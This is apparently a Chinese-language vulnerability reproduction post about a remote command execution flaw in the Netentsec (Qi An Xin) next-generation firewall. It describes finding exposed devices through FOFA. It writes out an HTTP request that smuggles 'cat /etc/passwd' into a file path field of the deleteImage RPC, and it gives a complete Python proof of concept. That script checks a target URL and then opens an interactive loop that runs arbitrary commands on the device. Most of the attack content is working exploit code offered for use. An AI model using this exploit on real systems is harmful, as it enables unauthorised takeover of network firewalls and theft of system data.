簡介
網康下一代防火牆(NGFW)是網康科技推出的一款可全面應對網絡威脅的高性能應用層防火牆。憑借超強的應用識别能力,下一代防火牆可深入洞察網絡流量中的使用者、應用和内容,借助全新的高性能單路徑異構并行處理引擎,在網際網路出口、資料中心邊界、應用服務前端等場景提供高效的應用層一體化安全防護,幫助使用者安全地開展業務并降低安全成本。
漏洞概述
存在遠端指令執行,漏洞攻擊者可以擷取伺服器權限。
影響範圍
奇安信 網康下一代防火牆
FOFA
複現過程
fofa搜尋:
![](https://img.laitimes.com/img/__Qf2AjLwojIjJCLyojI0JCLiAzNfRHLGZkRGZkRfJ3bs92YsYTMfVmepNHL4VEVOlXU65UMRpHW4Z0MMBjVtJWd0ckW65UbM5WOHJWa5kHT20ESjBjUIF2X0hXZ0xCMx81dvRWYoNHLrdEZwZ1Rh5WNXp1bwNjW1ZUba9VZwlHdssmch1mclRXY39CXldWYtlWPzNXZj9mcw1ycz9WL49zZuBnL2IDO3UjMycTM0EDNwEjMwIzLc52YucWbp5GZzNmLn9Gbi1yZtl2Lc9CX6MHc0RHaiojIsJye.png)
登入頁面:
使用burpsuite進行抓包,并構造資料包:
變更發包方式:POST /directdata/direct/router HTTP/1.1
添加POST資料:{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;cat /etc/passwd >/var/www/html/test.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}
通路test.txt獲得資料:
反彈shell
POC
# @Author:ximo
import requests
import time
from requests.packages.urllib3.exceptions import InsecureRequestWarning
def title():
print('+------------------------------------------')
print('+----------奇安信 網康下一代防火牆-------------')
print('+------------------------------------------')
def poc_1(target_url): # 判斷是否存在漏洞
vuln_url = target_url + '/directdata/direct/router'
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)',
"Content-Type": "application/json",
}
data = '{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;cat /etc/passwd >/var/www/html/test.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}'
try:
# 防止報錯
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# 第一次請求将 指令執行結果輸入到test.txt中
response1 = requests.post(url=vuln_url,headers=headers,data=data,verify=False,timeout=5)
# 判斷頁面傳回結果是否正确
if response1.status_code==200 and '"result":{"success":true}' in response1.text:
print('目标{}可能存在漏洞,正在執行 cat /etc/passwd'.format(target_url))
time.sleep(3)
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# 第二次請求傳回執行指令結果的頁面資訊
response2=requests.get(url=target_url + '/test.txt',headers=headers,verify=False)
if response2.status_code==200 and 'root:x:0:0:root:/root:/bin/bash' in response2.text:
print('結果為:\n{}'.format(response2.text))
# 執行其他指令
while 1:
cmd = input('輸入想要執行的指令,輸入exit退出\nCmd>>>')
if cmd =='exit':
break
else:
poc_2(target_url,cmd)
else:
print('目标不存在漏洞')
except Exception as e:
print('請求失敗')
def poc_2(target_url,cmd): # 執行任意指令
vuln_url = target_url + '/directdata/direct/router'
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)',
"Content-Type": "application/json",
}
data = '{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;%s >/var/www/html/test.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}' % (cmd)
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# 執行任意指令,結果輸入到test.txt中
response1 = requests.post(url=vuln_url,headers=headers,data=data,verify=False,timeout=5)
if response1.status_code==200 and '"result":{"success":true}' in response1.text:
print('正在執行 {}'.format(cmd))
time.sleep(3)
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# 請求指令結果的頁面
response2=requests.get(url=target_url + '/test.txt',headers=headers,verify=False)
print('結果為:\n{}'.format(response2.text))
except Exception as e:
print('請求失敗')
if __name__ == '__main__':
title()
target_url = str(input("\033[35m請輸入url\nUrl >>> \033[0m"))
poc_1(target_url)